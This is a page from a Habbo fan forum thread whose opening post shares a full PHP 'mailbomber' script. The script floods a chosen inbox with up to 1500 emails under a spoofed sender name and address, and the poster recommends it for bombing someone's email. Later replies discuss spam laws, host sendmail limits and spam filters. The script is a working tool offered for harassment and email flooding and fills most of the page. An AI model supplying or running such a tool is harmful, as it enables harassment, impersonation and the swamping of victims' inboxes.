Discover Habbo's history
Treat yourself with a Secret Santa gift.... of a random Wiki page for you to start exploring Habbo's history!
Happy holidays!
Celebrate with us at Habbox on the hotel, on our Forum and right here!
Join Habbox!
One of us! One of us! Click here to see the roles you could take as part of the Habbox community!


Page 1 of 2 12 LastLast
Results 1 to 10 of 12
  1. #1
    Join Date
    Dec 2006
    Posts
    3,970
    Tokens
    0

    Latest Awards:

    Default LOOL mail bombing

    found this script, you can bomb someones email, and the emails dont come up in spam box

    PHP Code:
    <?php
    // Script by Guido Chorus.
    session_start();
    $_SESSION['checked'] = 1// no login needed!
    $sUser "demo";
    $sPass "1234";
    function 
    validateEmail($pEmail) {
        
    ereg("([_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*)"$pEmail$regs);
        if(
    $regs[1] == $pEmail) {
            return 
    TRUE;
        }
        return 
    FALSE;
    }
    $action = (isset(
    $_POST['action']) && is_string(
    $_POST['action']) && strlen(
    $_POST['action'])
    >= 
    1)
    $_POST['action'] : -1;
    echo 
    "<font size='6'><b>FREE anonymous mailbomber :)</b></font><br><font size='4' color='gray'>annoy your friends..</font><br><br>";
    if(
    $_SESSION['checked'] == 1) {
        
    // This user is validated
        
    if($action == -1) {
            
    ?>
            <form input='' method='POST'>
            <input type='hidden' name='action' value='sended'>
            Email to (address):<br /> 
            <input name='to' type='text'><br />
            Your Real Name ;) :<br />
            <input name='realname' type='text'><br />
            Email from(reply address?):<br />
            <input name='from' type='text'><br />
            Subject:<br />
            <input name='subject' type='text'><br />
            dont tick: <input name='****back' type='checkbox'><br />
            Msg:<br />
            <textarea name='msg' rows='10' cols='60'></textarea><br />
            Number of bombs:<br />
            <select size="1" name="num">
                <option value="1">(1) Anonymous mail :)</option>
                <option value="3">(3) mwah</option>
                <option value="10">(10) could be more</option>
                <option value="50">(50) hehe</option>
                <option value="100">(100) nice</option>
                <option value="150">(150) painfull</option>
                <option value="300">(300) Whooppssssss!!!!</option>
                <option value="1500">(1500) Domina! o//</option>
            </select><br /><br />
            <input type='submit' value='BOMB UM!!'>
            </form>
            <?php
        
    }
        else {
            
    $to $_POST['to'];
            
    $realname $_POST['realname'];
            
    $from $_POST['from'];
            
    $subject $_POST['subject'];
            
    $msg $_POST['msg'];
            
    $num $_POST['num'];
            $****
    back $_POST['****back'];
            if(
    $to != "" && $realname != "" && $from != "" && $subject != "" && $msg != "" && $num != "" && validateEmail($from) && validateEmail($to)) {
                
    $message "";
                
    $headers "From: $realname<$from>\n";
                
    $headers .= "Reply-To: <$from>\n";
                
    $headers .= "MIME-Version: 1.0\n";
                
    $headers .= "Content-Type: multipart/related;type=\"multipart/alternative\"; boundary=\"----=MIME_BOUNDRY_main_message\"\n";
                
    $headers .= "X-Sender: $from<$from>\n";
                
    $headers .= "X-Mailer: PHP5\n"//mailer
                
    $headers .= "X-Priority: 1\n"//1 UrgentMessage, 3 Normal
                
    $headers .= "Return-Path: <$from>\n";
                
    $headers .= "This is a multi-part message in MIME format.\n";
                
    $headers .= "------=MIME_BOUNDRY_main_message \n";
                
    $headers .= "Content-Type: multipart/alternative; boundary=\"----=MIME_BOUNDRY_message_parts\"\n";
                
    $message == "";
                
    $message .= "------=MIME_BOUNDRY_message_parts\n";
                
    $message .= "Content-Type: text/html;\n    charset=\"iso-8859-1\"\n";
                
    $message .= "Content-Transfer-Encoding: quoted-printable\n";
                
    $message .= "\n";
                
    $message .= "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n";
                
    $message .= "<HTML><BODY><FONT FACE=VERDANA>\n";
                
    $message .= $msg;
                if($****
    back == "on") {
                    
    $message .= "<br><br><br>**** back at: <a href='http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php'>http://demo.scripts.boukoul.nl/php/mailbomber/mailbomber.php</a> :)";
                }
                for (
    $i 0$i $num$i++) {
                    
    mail($to,$subject,$message,$headers);
                    echo 
    $i " times bombed, muhahaha :D :D :D !!11!!!one!!!!eleven!!!111!!!<br>\n";
                }            
                echo 
    "<br><br><a href='"$_SERVER['PHP_SELF'] ."'><b>Send another one! Click here...</b></a>";
                echo 
    "<meta http-equiv=\"Refresh\" content=\"90; URL=''\" />";
            }
            else {
                echo 
    "Every field is required or an invalid email address (from and to).";
                echo 
    "<meta http-equiv=\"Refresh\" content=\"4; URL=''\" />";
            }
        }
    }
    else {
        
    // Needs to login or check.
        
    if($action == "checkLogin") {
            
    $user = (isset(
            
    $_POST['user']) && is_string(
            
    $_POST['user']) && strlen(
            
    $_POST['user'])
            >= 
    1)
            ? 
    $_POST['user'] : -1;
            
    $pass = (isset(
            
    $_POST['pass']) && is_string(
            
    $_POST['pass']) && strlen(
            
    $_POST['pass'])
            >= 
    1)
            ? 
    $_POST['pass'] : -1;
            if(
    $user != -&& $pass != -1) {
                if(
    $sUser == $user && $sPass == $pass) {
                    
    $_SESSION['checked'] = 1;
                }
            }
            echo 
    "<meta http-equiv=\"Refresh\" content=\"0; URL=''\" />";
        }
        else {
            
    ?>
            <form action="" method='POST'>
            <input type='hidden' name='action' value='checkLogin'>
            Username:<br />
            <input type="text" name="user" value="demo"><br />
            Password:<br />
            <input type="password" name="pass" value="1234"><br />
            <input type='submit' value='login'>
            </form>
            <?php
        
    }
    }
    ?>
    Lets set the stage on fire, and hollywood will be jealous.

  2. #2
    Join Date
    Sep 2007
    Location
    USA
    Posts
    474
    Tokens
    0

    Default

    LOL the only problem with that is you can get sued in the states for bulk i beleive its in uk too but in the states i can cost the spammer $10 a mail or a grand a day so its something to think about fore you go going around spamming still cool could be used to do a newslater with some editing

    Also the not in spam box is cause of the name hasnt been blocked HOWEVER
    most spam boxes filter due to name
    Last edited by LegendOfNoob; 01-03-2008 at 04:31 PM.
    Post Meter
    ______________________________________________
    400 450 500 550 600 650 700 750 800 850 900-1k
    Green=Done | Orange=Almost | Red=Not Done
    ______________________________________________
    Habbo fury Coming Soon!
    My Img tag has ran away

  3. #3
    Join Date
    May 2006
    Location
    Hull
    Posts
    7,701
    Tokens
    2,430
    Habbo
    Moh

    Latest Awards:

    Default

    Quote Originally Posted by LegendOfNoob View Post
    LOL the only problem with that is you can get sued in the states for bulk i beleive its in uk too but in the states i can cost the spammer $10 a mail or a grand a day so its something to think about fore you go going around spamming still cool could be used to do a newslater with some editing

    Also the not in spam box is cause of the name hasnt been blocked HOWEVER
    most spam boxes filter due to name
    When we send our auto email (From DJ Panel) it has a name (Well its "Radio Panel Details") and it still sends to Junk?

  4. #4
    Join Date
    Sep 2007
    Location
    USA
    Posts
    474
    Tokens
    0

    Default

    you see your mail may say it as junk due to the Panel word commonly a sales email
    also what does it send the email from certain words in email also are considered bulk aswell as it could be your sitename
    Post Meter
    ______________________________________________
    400 450 500 550 600 650 700 750 800 850 900-1k
    Green=Done | Orange=Almost | Red=Not Done
    ______________________________________________
    Habbo fury Coming Soon!
    My Img tag has ran away

  5. #5
    Join Date
    May 2006
    Location
    Hull
    Posts
    7,701
    Tokens
    2,430
    Habbo
    Moh

    Latest Awards:

    Default

    Quote Originally Posted by LegendOfNoob View Post
    you see your mail may say it as junk due to the Panel word commonly a sales email
    also what does it send the email from certain words in email also are considered bulk aswell as it could be your sitename
    Thats a bit of a pain
    Another thing is, it says From: *cPanel User*@*servername*.*serverip*.com on Behalf of *email*.
    Which is realy annoying.

  6. #6
    Join Date
    Sep 2007
    Location
    USA
    Posts
    474
    Tokens
    0

    Default

    indeed that is on a spam list you need a different way of doing that hmm heres a tip try not using cpanel and get a regular script it will work much better and should be more interchangable
    Post Meter
    ______________________________________________
    400 450 500 550 600 650 700 750 800 850 900-1k
    Green=Done | Orange=Almost | Red=Not Done
    ______________________________________________
    Habbo fury Coming Soon!
    My Img tag has ran away

  7. #7
    Join Date
    Jan 2007
    Location
    Canada eh?
    Posts
    766
    Tokens
    75

    Default

    I guess no one realized that 90% of hosts have php sendmail limits? Also, I doubt that this would work flawlessly without any of the emails being marked as spam.

    And just FYI, if you have GMail you can just search/delete by subject and sender.

  8. #8
    Join Date
    Jan 2008
    Location
    England
    Posts
    285
    Tokens
    0

    Default

    Quote Originally Posted by Scriptz View Post
    I guess no one realized that 90% of hosts have php sendmail limits? Also, I doubt that this would work flawlessly without any of the emails being marked as spam.

    And just FYI, if you have GMail you can just search/delete by subject and sender.
    I thought cpanel had this defaulty?

  9. #9
    Join Date
    Sep 2006
    Location
    Evanston, Illinois.
    Posts
    2,361
    Tokens
    0

    Latest Awards:

    Default

    This is all very well until 60 year old dorris comes along to check her emails from her favorite knitting website and finds a bunch of rude, rude, oh so rude words. She believes this is not aloud and calls the police, they find out its a crime you get done in. Nuff said.
    How could this hapen to meeeeeeeeeeeeeee?lol.

  10. #10
    Join Date
    Aug 2005
    Location
    Newcastle
    Posts
    1,417
    Tokens
    0

    Latest Awards:

    Default

    It's not the best I've seen. It's not worth uploading to test as there are other better ways to spam mail boxes. Also, there is a law within the UK that allows people to run websites that allows you to sign up (basically for spam, woo fun!) as you can tell, no one uses it for themselves, they register other members.



Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •